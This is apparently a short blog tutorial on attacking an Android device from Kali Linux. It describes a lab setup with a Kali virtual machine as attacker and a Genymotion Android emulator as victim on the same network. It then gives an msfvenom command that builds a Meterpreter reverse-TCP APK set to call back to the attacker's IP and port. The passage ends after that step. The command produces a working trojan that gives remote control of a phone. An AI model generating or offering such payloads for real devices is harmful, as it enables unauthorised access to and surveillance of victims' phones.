Exploiting Android using Kali Linux
Hello everyone, this blog is related to exploiting Android system using Kali Linux.
So, basically we need two operating systems, First one is kali(attacker) and second one is Android(victim).
This Practical works when both of the machines are in same network.
So. I have installed Kali-linux in Virtualbox and I am using Genymotion for Android.
And I have managed to put the both machines on same network, you have to do same if you are also trying to do same as me. Otherwise Important is both the machines has to be on same network,
This also works if you have host machine kali and on other side you have Android Device with you.
You can also install kali on Virtualbox and set it to NAT network.
For surety u can ping the Android Device machine from Kali to check that the machines are on same network or not.
Practical Starts Here ------>
1. go to kali terminal and type the following command.
type your kali ip instead of 170.9.210.105
msfvenom –p android/meterpreter/reverse_tcp LHOST=170.9.210.105 LPORT=4444 R> ~/Desktop/Danny.apk
Comments
Post a Comment